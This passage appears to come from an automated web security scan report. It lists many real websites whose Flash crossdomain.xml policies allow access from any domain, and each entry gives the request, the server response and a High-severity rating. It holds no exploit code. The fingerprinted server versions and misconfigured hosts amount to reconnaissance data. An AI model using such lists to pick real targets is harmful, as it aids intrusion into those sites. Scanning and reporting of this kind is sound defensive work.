GET /crossdomain.xml HTTP/1.0
Host: www.heels.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_throttle/3.1.2 PHP/5.2.10 FrontPage/5.0.2.2623 mod_ssl/2.8.31 OpenSSL/0.9.7a
Vary: *
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:26:45 GMT
Last-Modified: Tue, 02 Mar 2010 14:39:54 GMT
ETag: "7a4463-c9-4b8d233a"
Accept-Ranges: bytes
Content-Length: 201
Content-Type: application/xml
Date: Wed, 04 May 2011 01:21:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.93. http://www.holtorfmed.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.holtorfmed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.holtorfmed.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:13:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 16 Jun 2010 19:59:27 GMT
ETag: "23f8003-c6-4892b28be45c0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.94. http://www.hotdog.hu/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotdog.hu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hotdog.hu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:59 GMT
Server: Apache
Vary: Host
Last-Modified: Thu, 05 Jun 2008 12:58:16 GMT
Accept-Ranges: bytes
Content-Length: 265
W: w28
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<site-contr
...[SNIP]...

7.95. http://www.house365.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.house365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.house365.com

Response

HTTP/1.0 200 OK
Server: Apache
Date: Wed, 04 May 2011 03:29:19 GMT
Content-Type: text/xml; charset=gb2312
Content-Length: 100
Last-Modified: Fri, 07 Sep 2007 08:56:46 GMT
Accept-Ranges: bytes
X-Cache: MISS from cache1.house365.com
X-Cache-Lookup: MISS from cache1.house365.com:8081
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.96. http://www.howdini.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.howdini.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.howdini.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:20 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 31 Jan 2011 16:50:08 GMT
ETag: "508b34-1d3-355a9000"
Accept-Ranges: bytes
Content-Length: 467
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
       <allow-access-from domain="www.touchstorm.com"/>
       <allow-access-from domain="dev.touchstorm.com"/>
   <allow-access-from domain="touchstorm.com"/>
   <allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="www.facebook.com" />
       <allow-access-from domain="*"/>
...[SNIP]...

7.97. http://www.hrs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hrs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hrs.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 28 Apr 2011 08:39:38 GMT
Content-Type: application/xml
Content-Length: 107
Date: Wed, 04 May 2011 03:31:56 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.98. http://www.hugo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hugo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hugo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:41 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 11:31:04 GMT
ETag: "cc23e-64-4a0cb24db4e00"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.99. http://www.instaproofs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instaproofs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instaproofs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:16 GMT
Server: Apache
Last-Modified: Mon, 13 Apr 2009 17:27:34 GMT
ETag: "1534c1-c3-4677307a50d80"
Accept-Ranges: bytes
Content-Length: 195
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.100. http://www.izlesene.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.izlesene.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.izlesene.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
Last-Modified: Fri, 06 Feb 2009 08:59:11 GMT
Content-Length: 119
Connection: close
Date: Wed, 04 May 2011 01:21:18 GMT
Server: Nokta

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


7.101. http://www.japanesematures.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanesematures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.japanesematures.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:52 GMT
Server: Apache
Last-Modified: Fri, 15 Oct 2010 13:38:07 GMT
ETag: "26cb1ac-8d-4cb8593f"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

7.102. http://www.jasonaldean.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jasonaldean.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jasonaldean.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:05:27 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 18:38:07 GMT
ETag: "3ce91-cc-48783933481c0"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: application/xml
Via: 1.1 nightrider (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=c0a8004d50; path=/; expires=Tue, 03 May 2011 21:08:44 GMT

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain = "*" />
</cross-domain-pol
...[SNIP]...

7.103. http://www.jazzradio.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jazzradio.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jazzradio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:27 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 29 Jul 2009 17:24:09 GMT
ETag: "2542b2-af-46fdb74722040"
Accept-Ranges: bytes
Content-Length: 175
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

7.104. http://www.jeuxvideo.fr/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jeuxvideo.fr
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jeuxvideo.fr

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 30 Sep 2010 13:26:56 GMT
ETag: "cf-4917a082c4800"
Content-Type: application/xml
X-Cache-IP: 172.16.1.28
X-Powered-By: Cobol Server 2.0
X-Cacheable: YES
Content-Length: 207
Date: Wed, 04 May 2011 04:01:10 GMT
Age: 3
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.105. http://www.joshgroban.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joshgroban.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.joshgroban.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:56 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 14 Jul 2010 20:02:37 GMT
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:16:56 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.106. http://www.joydesk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joydesk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.joydesk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:12 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Thu, 15 Apr 2010 16:23:52 GMT
ETag: "61209-cb-48448eb989600"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.107. http://www.juicyjuice.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.juicyjuice.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.juicyjuice.com

Response

HTTP/1.0 200 OK
Content-Length: 211
Content-Type: text/xml
Last-Modified: Fri, 29 Apr 2011 03:54:11 GMT
Accept-Ranges: bytes
ETag: "54fa5819216cc1:508f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Wed, 04 May 2011 01:57:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:57:49 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domai
...[SNIP]...

7.108. http://www.jukeboxalive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jukeboxalive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jukeboxalive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:42 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 04 Sep 2007 16:26:14 GMT
ETag: "c6-43951bf739580"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.109. http://www.jumeirah.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumeirah.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jumeirah.com

Response

HTTP/1.1 200 OK
Set-Cookie: AlteonP=ad0a051bad0a5b9cbaeeba89; path=/
Content-Length: 262
Content-Type: text/xml
Content-Location: http://www.jumeirah.com/crossdomain.xml
Last-Modified: Wed, 14 Jul 2010 03:55:32 GMT
Accept-Ranges: bytes
ETag: "092e567823cb1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:33:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-h
...[SNIP]...

7.110. http://www.kaplancollege.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaplancollege.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaplancollege.com

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: text/xml
Content-Location: http://www.kaplancollege.com/crossdomain.xml
Last-Modified: Tue, 12 Oct 2010 19:37:07 GMT
Accept-Ranges: bytes
ETag: "6360c5da446acb1:9567"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:30 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-http-request-headers-from domain="*" headers="*" secure="false"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.111. http://www.kcbd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kcbd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kcbd.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:a0e"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 00:41:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 00:41:19 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.112. http://www.kcoy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kcoy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kcoy.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9f2"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 02:53:13 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 02:53:13 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.113. http://www.keegy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.keegy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keegy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 07 Apr 2011 15:50:46 GMT
ETag: "2c70161-c6-4a05612918180"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.114. http://www.kellymom.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kellymom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kellymom.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
Last-Modified: Sat, 23 Oct 2010 05:37:17 GMT
ETag: "2019fa0-c7-4934226ec7d40"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.115. http://www.kentuckysportsradio.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kentuckysportsradio.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kentuckysportsradio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 28 Aug 2009 19:57:31 GMT
ETag: "92e57c-ca-182ac0c0"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Cache-Control: max-age=172800, proxy-revalidate
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.116. http://www.kfyi.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kfyi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kfyi.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3187053062 3186933632
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 00:52:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 00:52:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.117. http://www.khow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.khow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.khow.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3191550372
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 03:18:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:18:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.118. http://www.kimt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kimt.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:30 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n31 ( iad-agg-n5), ms iad-agg-n5 ( origin>CONN)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:11:30 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.119. http://www.kiss957.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiss957.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kiss957.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189572868
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:09:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:09:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.120. http://www.kisw.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kisw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kisw.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:09 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
Last-Modified: Wed, 23 Apr 2008 18:04:28 GMT
ETag: "33c19-125-480f7a2c"
Accept-Ranges: bytes
Content-Length: 293
Keep-Alive: timeout=5, max=19994
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerRadio_Pool=2467317827.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-
...[SNIP]...

7.121. http://www.kivitv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kivitv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kivitv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
